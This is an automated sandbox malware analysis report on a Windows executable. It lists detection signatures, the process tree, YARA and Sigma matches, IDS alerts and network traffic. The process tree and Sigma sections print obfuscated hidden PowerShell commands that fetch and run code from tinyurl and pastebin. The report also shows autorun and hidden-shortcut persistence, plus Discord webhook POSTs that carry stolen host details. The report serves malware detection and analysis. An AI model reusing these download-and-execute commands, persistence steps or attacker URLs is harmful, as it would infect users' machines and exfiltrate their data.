Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
vF20HtY4a4.exe

Overview

General Information

Sample name:vF20HtY4a4.exe
renamed because original name is a hash value
Original sample name:f06b0c9ae4553b0558c06ecfcb657a9f1d5a42da37caec81ae4a91dd5d03b332.exe
Analysis ID:1534114
MD5:d17a39ca8331a4ce65261b1b6dc7e6ac
SHA1:7972d0341973a0816d2534f187676f9c00dc38c7
SHA256:f06b0c9ae4553b0558c06ecfcb657a9f1d5a42da37caec81ae4a91dd5d03b332
Tags:exeNeth3Nuser-JAMESWT_MHT
Infos:

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Powershell creates an autostart link
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to open files direct via NTFS file id
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Connects to a URL shortener service
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • vF20HtY4a4.exe (PID: 5028 cmdline: "C:\Users\user\Desktop\vF20HtY4a4.exe" MD5: D17A39CA8331A4CE65261B1B6DC7E6AC)
    • conhost.exe (PID: 6740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3576 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing) MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • attrib.exe (PID: 5048 cmdline: "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
  • forfiles.exe (PID: 4620 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 3004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3560 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 6272 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • forfiles.exe (PID: 6816 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 7140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2168 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 6976 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 6272INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x50cc3:$b1: ::WriteAllBytes(
  • 0xe4340:$s1: -join
  • 0xe892e:$s1: -join
  • 0x1360f6:$s1: -join
  • 0x136856:$s1: -join
  • 0x22785:$s3: reverse
  • 0x2b8af:$s3: reverse
  • 0xa251f:$s3: reverse
  • 0xaded1:$s3: reverse
  • 0x102979:$s3: reverse
  • 0x1095ad:$s3: reverse
  • 0x10b2a0:$s3: reverse
  • 0x1162cf:$s3: reverse
  • 0x16223a:$s3: reverse
  • 0x162528:$s3: reverse
  • 0x162c42:$s3: reverse
  • 0x1633fb:$s3: reverse
  • 0x16a641:$s3: reverse
  • 0x16aa5b:$s3: reverse
  • 0x16b5e3:$s3: reverse
  • 0x16c290:$s3: reverse
Process Memory Space: powershell.exe PID: 6976INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x80c57:$b1: ::WriteAllBytes(
  • 0x13e6ab:$b1: ::WriteAllBytes(
  • 0xc4e9e:$s1: -join
  • 0xcbe7e:$s1: -join
  • 0x15e446:$s1: -join
  • 0x15ebe0:$s1: -join
  • 0x549a4:$s3: reverse
  • 0x54c92:$s3: reverse
  • 0x553ac:$s3: reverse
  • 0x55b65:$s3: reverse
  • 0x5cd58:$s3: reverse
  • 0x5d172:$s3: reverse
  • 0x5dcfa:$s3: reverse
  • 0x5e9a7:$s3: reverse
  • 0x85d8c:$s3: reverse
  • 0x8c9c0:$s3: reverse
  • 0x8ea6c:$s3: reverse
  • 0x99a9b:$s3: reverse
  • 0xa6b0a:$s3: reverse
  • 0xb2466:$s3: reverse
  • 0x18f609:$s3: reverse

Other

SourceRuleDescriptionAuthorStrings
amsi64_6272.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process
amsi64_6976.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process

Sigma Signatures

System Summary

barindex
Sigma detected: Suspicious PowerShell Parameter Substring
Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\vF20HtY4a4.exe", ParentImage: C:\Users\user\Desktop\vF20HtY4a4.exe, ParentProcessId: 5028, ParentProcessName: vF20HtY4a4.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing), ProcessId: 3576, ProcessName: powershell.exe
Sigma detected: CurrentVersion Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3576, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive File Sync
Sigma detected: PowerShell Web Download
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\vF20HtY4a4.exe", ParentImage: C:\Users\user\Desktop\vF20HtY4a4.exe, ParentProcessId: 5028, ParentProcessName: vF20HtY4a4.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing), ProcessId: 3576, ProcessName: powershell.exe
Sigma detected: Usage Of Web Request Commands And Cmdlets
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\vF20HtY4a4.exe", ParentImage: C:\Users\user\Desktop\vF20HtY4a4.exe, ParentProcessId: 5028, ParentProcessName: vF20HtY4a4.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing), ProcessId: 3576, ProcessName: powershell.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\vF20HtY4a4.exe", ParentImage: C:\Users\user\Desktop\vF20HtY4a4.exe, ParentProcessId: 5028, ParentProcessName: vF20HtY4a4.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing), ProcessId: 3576, ProcessName: powershell.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-15T16:14:49.219568+020028576591A Network Trojan was detected192.168.2.649865162.159.136.232443TCP
2024-10-15T16:14:56.440572+020028576591A Network Trojan was detected192.168.2.649895162.159.136.232443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-15T16:14:36.548868+020028576581A Network Trojan was detected192.168.2.649841162.159.136.232443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: vF20HtY4a4.exeReversingLabs: Detection: 34%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 90.0% probability
Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.6:49765 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.6:49834 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.6:49838 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.6:49841 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.6:49849 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.6:49853 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.6:49865 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.6:49895 version: TLS 1.2
Source: vF20HtY4a4.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000F.00000002.2871390762.000001FDFB84F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbc source: powershell.exe, 0000000A.00000002.3021367651.000002545A141000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbll source: powershell.exe, 0000000A.00000002.3020771983.0000025459F59000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2870296573.000001FDFB620000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 0000000A.00000002.3021367651.000002545A141000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.3021367651.000002545A141000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2871390762.000001FDFB819000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 0000000F.00000002.2871390762.000001FDFB876000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbx86) source: powershell.exe, 0000000A.00000002.3022670812.000002545A173000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.2871390762.000001FDFB819000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.Management.Automation.pdb- source: powershell.exe, 0000000A.00000002.3021367651.000002545A141000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089 source: powershell.exe, 0000000A.00000002.3021367651.000002545A141000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Administrator.ADMINISTRATOR\Downloads\Origami-master\Origami-master\src\obj\x64\Release\net472\Origami.pdb source: vF20HtY4a4.exe
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 0000000A.00000002.3021367651.000002545A141000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2871390762.000001FDFB876000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb=C:\% source: powershell.exe, 0000000A.00000002.3022670812.000002545A173000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.2870296573.000001FDFB644000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb" source: powershell.exe, 0000000A.00000002.3021367651.000002545A141000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb` source: powershell.exe, 0000000F.00000002.2870296573.000001FDFB620000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbA{1 source: powershell.exe, 0000000F.00000002.2871390762.000001FDFB7DC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.3020771983.0000025459F40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2870296573.000001FDFB5A8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscoree.dllKC:/Users/GLaDOS/The/Cake/Is/A/Lie.pdb source: vF20HtY4a4.exe
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 0000000A.00000002.3021367651.000002545A0F3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2871390762.000001FDFB7DC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 0000000A.00000002.3020771983.0000025459F40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2870296573.000001FDFB5A8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb source: powershell.exe, 0000000F.00000002.2871390762.000001FDFB819000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Administrator.ADMINISTRATOR\Downloads\Origami-master\Origami-master\src\obj\x64\Release\net472\Origami.pdbSHA256 source: vF20HtY4a4.exe
Source: Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbh/ source: powershell.exe, 0000000F.00000002.2871390762.000001FDFB876000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000A.00000002.3021367651.000002545A141000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 0000000F.00000002.2871390762.000001FDFB84F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.3021367651.000002545A141000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000A.00000002.3021367651.000002545A141000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2871390762.000001FDFB876000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.3021367651.000002545A141000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2871390762.000001FDFB876000.00000004.00000020.00020000.00000000.sdmp

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2857658 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Registration : 192.168.2.6:49841 -> 162.159.136.232:443
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.6:49865 -> 162.159.136.232:443
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.6:49895 -> 162.159.136.232:443
Connects to a pastebin service (likely for C&C)
Source: unknownDNS query: name: pastebin.com
Source: unknownDNS query: name: tinyurl.com
Source: unknownDNS query: name: tinyurl.com
Source: Joe Sandbox ViewIP Address: 104.20.3.235 104.20.3.235
Source: Joe Sandbox ViewIP Address: 104.20.3.235 104.20.3.235
Source: Joe Sandbox ViewIP Address: 162.159.136.232 162.159.136.232
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewASN Name: FASTLYUS FASTLYUS
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_crypter.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSI HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 221Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 302Connection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 302Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /bdhpvpny HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: tinyurl.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_crypter.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /bdhpvpny HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: tinyurl.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
